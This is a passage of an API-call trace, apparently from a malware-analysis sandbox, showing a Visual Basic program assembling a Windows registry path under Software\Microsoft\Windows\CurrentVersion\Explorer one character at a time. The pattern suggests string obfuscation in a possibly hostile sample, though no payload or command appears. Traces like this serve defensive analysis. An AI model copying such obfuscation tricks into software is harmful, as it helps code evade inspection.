CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0085.045] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.045] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0085.045] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.046] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.046] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.046] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.046] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.046] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0085.047] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.047] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.047] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.047] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.047] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.047] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.048] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.048] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0085.048] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.048] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.048] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.048] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0085.049] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.049] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0085.049] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.049] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.049] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.050] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.050] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.050] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.050] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.050] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0085.051] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.051] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0085.051] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.051] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0085.052] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.052] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.052] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.052] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.053] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.053] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0085.053] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.053] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.054] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.054] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0085.054] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.054] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.054] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.054] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.055] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.055] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0085.055] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.055] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0085.055] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.056] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.056] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.056] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0085.056] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.056] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.056] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.057] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0085.057] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.057] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0085.057] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.057] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.058] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.058] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0085.058] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.058] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0085.058] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.058] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.059] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.059] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.059] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.059] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.059] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.060] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.060] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.060] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.060] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.060] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0085.061] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.061] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.061] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.061] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.061] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.061] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0085.062] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.062] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0085.062] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.062] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.062] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.062] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.063] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.063] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.064] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.064] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.064] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.064] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0085.065] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.065] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0085.065] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.065] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0085.065] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.066] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.066] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.066] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.066] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.066] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.067] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.067] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.068] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.068] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.068] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.068] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0085.068] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.068] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, 